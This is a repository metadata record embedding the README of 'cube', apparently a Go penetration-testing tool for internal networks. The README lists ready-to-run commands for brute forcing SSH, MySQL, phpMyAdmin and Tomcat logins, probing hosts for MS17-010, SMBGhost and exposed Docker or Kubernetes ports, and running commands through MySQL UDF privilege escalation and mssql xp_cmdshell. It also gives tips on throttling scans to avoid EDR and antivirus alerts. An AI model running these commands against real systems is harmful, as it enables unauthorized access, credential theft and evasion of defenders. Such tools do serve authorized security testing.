{"id":13842204,"url":"https://github.com/JKme/cube","last_synced_at":"2025-07-11T14:31:17.455Z","repository":{"id":37328027,"uuid":"360818270","full_name":"JKme/cube","owner":"JKme","description":"Internal network penetration testing tool: weak password brute forcing, information gathering and vulnerability scanning","archived":false,"fork":false,"pushed_at":"2024-01-31T07:48:39.000Z","size":12272,"stargazers_count":595,"open_issues_count":0,"forks_count":65,"subscribers_count":12,"default_branch":"master","last_synced_at":"2024-11-21T12:45:05.354Z","etag":null,"topics":["crack","probe","sqlcmd"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JKme.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-04-23T08:38:49.000Z","updated_at":"2024-11-14T01:46:32.000Z","dependencies_parsed_at":"2023-12-04T10:28:48.530Z","dependency_job_id":"747095d2-4ebb-4aad-8921-f314b7c84edf","html_url":"https://github.com/JKme/cube","commit_stats":null,"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/JKme/cube","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JKme","download_url":"https://codeload.github.com/JKme/cube/tar.gz/refs/heads/master","sbom_url":"https://repo
s.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264833273,"owners_count":23670617,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["crack","probe","sqlcmd"],"created_at":"2024-08-04T17:01:29.318Z","updated_at":"2025-07-11T14:31:16.875Z","avatar_url":"https://github.com/JKme.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"## Disclaimer\n\u003eSpecial notice: this tool is for security research only. Using this project for illegal activity is prohibited; otherwise you bear the resulting liability yourself.\n\n## Features\n- Easy to extend, plugins can be added quickly\n- Supports writing results to an Excel document\n- Minimal command-line parameters that are easy to remember\n\n## One-shot run\nIf you do not have the patience to read the command options below, run the following commands and then open pwn.xlsx; the final results are shown aggregated by IP:\n```\ncube crack -x X -s 192.168.2.1/24 -o /tmp/pwn.xlsx\ncube probe -x Y -s 192.168.2.1/24 -o /tmp/pwn.xlsx\ncube probe -x K8S -s 192.168.2.1/24 -o /tmp/pwn.xlsx\t//if k8s exists on the internal network, ports 2379, 10250 and 6443 are scanned\n```\n![report.png](./image/report.png)\n\n## Global parameters\n- `-v`: more detailed output, generally used for debugging\n- `-n`: sets the number of threads for the `crack` and `probe` modules, default 30\n- `--delay`: when set to n, the `crack` and `probe` modules are forced to a single thread and sleep n seconds between runs; used to bypass EDR\n\n\n## 0x1. 
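crack module\n#### Brute force SSH with the built-in dictionary\n```shell\ncube crack -s 192.168.1.1 -x ssh\n```\n#### Brute force SSH with specified users and passwords\n```shell\ncube crack -l root,ubuntu -p 123,000111,root -x ssh -s 192.168.1.1\ncube crack -L user.txt -P pass.txt -s 192.168.1.1/24 -x ssh\ncube crack -l root -P pass.txt -s 192.168.1.1/24 -x ssh\n```\n#### Brute force SSH on a specified port\n```shell\ncube crack -l root -p root -s 192.168.1.1 -x ssh --port 2222\n```\n#### Brute force ssh and mysql with the built-in dictionary\n```shell\n# Brute force mysql and ssh (note: there is no space around the comma between ssh and mysql)\ncube crack -s 192.168.1.1 -x ssh,mysql\n```\n#### Brute force phpmyadmin (cannot be combined with other plugins)\n```shell\ncube crack -s http://192.168.2.1 -x phpmyadmin\n```\n\n#### Brute force tomcat (cannot be combined with other plugins)\n```shell\ncube crack -x httpbasic -s http://127.0.0.1:7788/manager -v\n```\n\n#### Load all brute-force plugins (except `httpbasic/jenkins/phpmyadmin/zabbix`)\n```shell\ncube crack -x X -s 192.168.1.1\n```\n\n* HTTP brute-force plugins such as phpmyadmin can only be used on their own and cannot be loaded together with other plugins; the plugins of this kind are: `httpbasic/jenkins/phpmyadmin/zabbix`\n* The `httpbasic` module brute forces services that use basic auth, such as the tomcat login or nginx basic auth\n* `-x X` loads all available brute-force plugins; the port is checked first and brute forcing starts once the port is open\n* When no user or password is specified, the built-in dictionary is loaded\n* The `zabbix` plugin is practically useless: after 5 failed brute-force attempts it locks for 30s\n* **The default is 30 threads; brute forcing at that setting triggers x绒 alerts, so 10 to 15 is recommended**\n\n#### Supported brute-force plugins\n* Can be combined: `elastic/ftp/mongo/mssql/mysql/postgres/redis/smb/ssh`\n* Cannot be combined: `httpbasic/jenkins/phpmyadmin/zabbix`\n\n## 0x2. 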
probe module\n#### Load all default plugins\n```shell\n# -x Y loads all probe plugins; -x X loads only a subset of default plugins\ncube probe -x X -s 192.168.2.1/24\ncube probe -x Y -s 192.168.2.1/24\n```\n#### Load specified plugins\n```shell\n# Load the oxid and ms17010 plugins\ncube probe -x oxid,ms17010 -s 192.168.2.1/24\n\n# Load the WIN plugin set, which contains ping,netbios,oxid,smb,winrm,wmi,mssql\ncube probe -x WIN -s 192.168.2.1/24\n```\n\n#### Supported probe plugins\n| FUNC                                                            | PORT  | LOAD BY X |\n|-----------------------------------------------------------------|-------|-----------|\n| docker                                                          | 2375  | Y         |\n| dubbo                                                           | 20880 | Y         |\n| etcd                                                            | 2379  | Y         |\n| k8s10250                                                        | 10250 | N         |\n| k8s6443                                                         | 6443  | N         |\n| ms17010                                                         | 445   | Y         |\n| mssql                                                           | 1433  | N         |\n| netbios                                                         | 137   | N         |\n| oxid                                                            | 135   | Y         |\n| ping                                                            |       | N         |\n| rmi                                                             | 1099  | Y         |\n| smb                                                             | 445   | Y         |\n| smbghost                                                        | 445   | Y         |\n| winrm                                                           | 5985  | N         |\n| wmi                                                             | 135   | N         |\n| zookeeper                                                       | 2181  | Y         |\n| 
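[jboss](https://github.com/JKme/cube/wiki#jboss-3873)           | 3873  | Y         |\n| [prometheus](https://github.com/JKme/cube/wiki#prometheus-9090) | 9090  | Y         |\n\n* `smb/wmi/winrm/mssql` use the NTLM authentication exchange to obtain [Windows version and system information](https://jkme.github.io/2021/08/06/windows-ntlm-smb-scan.html)\n* When using `ping/netbios`, run them on their own for more accurate results; 10 threads is recommended\n* `Load By X`: whether the plugin is loaded by `-x X` when running `cube probe -x X -s 192.168.2.1/24`\n\n## 0x3. Result output\nAny plugin of the `crack` and `probe` modules can be run with `-o result.xlsx` to write the results to Excel. When the Excel file already exists, cube automatically appends the current scan results to the document. After the scan finishes, freezing the first row and first column of the document makes it easier to read.\n\n## 0x4. Rapid development\n#### Crack module\nThe Crack module can be viewed as a brute-force framework. When the plugin you need is not in Cube's list of available plugins, you can quickly develop one in Go.\nThe command parameters of the `crack` module, such as `-l/-L, -p/-P, --port`, also apply to newly added plugins. For example, to add a custom brute-force plugin named `cloud` with default port `8080` that uses the built-in `config.PASSWORDS` as its default passwords, the plugin needs to implement the following interface of the `crack` module:\n```go\n\tCrackName() string       //plugin name\n\tCrackPort() string       //default plugin port\n\tCrackAuthUser() []string //default usernames to brute force\n\tCrackAuthPass() []string //default passwords to brute force; config.PASSWORD can be used\n\tIsMutex() bool           //whether the plugin can only be used on its own, e.g. HTTP plugins such as the phpmyadmin brute forcer; elastic is an exception\n\tCrackPortCheck() bool    //whether a port check is needed; set to true for TCP protocols; standalone plugins such as phpmyadmin and UDP-based protocols skip the port check and set this to false\n\tExec() CrackResult       //the actual brute-force implementation\n```\n![crack.gif](./image/crack.gif)\n\n\n * To have `-x X` load `cloud`, edit `config/config.go` and add `cloud` to the `CrackX` list\n\n#### Probe module\nAdding a Probe plugin works much like crack; the module can likewise be viewed as an information-gathering framework. A new plugin needs to implement the following interface:\n\n```go\n\tProbeName() string      //plugin name\n\tProbePort() string      //default plugin port\n\tPortCheck() bool        //whether a port check is needed\n\tProbeExec() ProbeResult //run the plugin\n```\n\n## 0x5. Sqlcmd module\nUsed for MySQL UDF privilege escalation (currently Windows x64 only) and mssql command execution:\n```shell\n# Enable UDF and execute a command\ncube sqlcmd -x mysql -l root -p root -e \"whoami\"\n\n# Clear xp_cmdshell\ncube sqlcmd -x mysql -l root -p root -e \"clear\"\n\n# Specify the mssql port\ncube sqlcmd -x mssql -l sa -p sa -e \"whoami\" --port 4134\n```\n#### Available plugins\n![report.png](./image/sqlcmd.png)\n\n\n\n### References\n* [X-Crack](https://github.com/netxfly/x-crack)\n* [LadonGo](https://github.com/k8gege/LadonGo)\n* 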
[fscan](https://github.com/shadow1ng/fscan)\n* [gobuster](https://github.com/OJ/gobuster)\n* [sqltool](https://github.com/mabangde/pentesttools/blob/master/golang/sqltool.go)\n* [F-Scrack](https://github.com/y1ng1996/F-Scrack)\n\n\n## TODO\n* [Database exploitation tool](http://ryze-t.com/posts/2022/02/16/%E6%95%B0%E6%8D%AE%E5%BA%93%E8%BF%9E%E6%8E%A5%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7-Sylas.html)\n* [MDUT](https://github.com/SafeGroceryStore/MDUT)\n* Finish the SQLCMD module\n```\n  -m ls  \u003cdst path\u003e\n  -m cat \u003cdst file\u003e\n  -m upload \u003csrc path\u003e \u003cdst path\u003e\n  -m exec \u003ccmd string\u003e\n```\n\n```shell\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql exec \"whoami\"\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql upload  \u003csrc\u003e \u003cdst\u003e\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql ls  \u003csrc\u003e\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql cat  \u003csrc\u003e \n```\n* [Check whether an interface is implemented](https://go.dev/play/p/tNNDukK4wRi)\n* The mssql probe in the probe module seems to have a problem; needs confirmation\n\n---\n### Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/JKme/cube.svg)](https://starchart.cc/JKme/cube)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJKme%2Fcube","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FJKme%2Fcube","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJKme%2Fcube/lists"}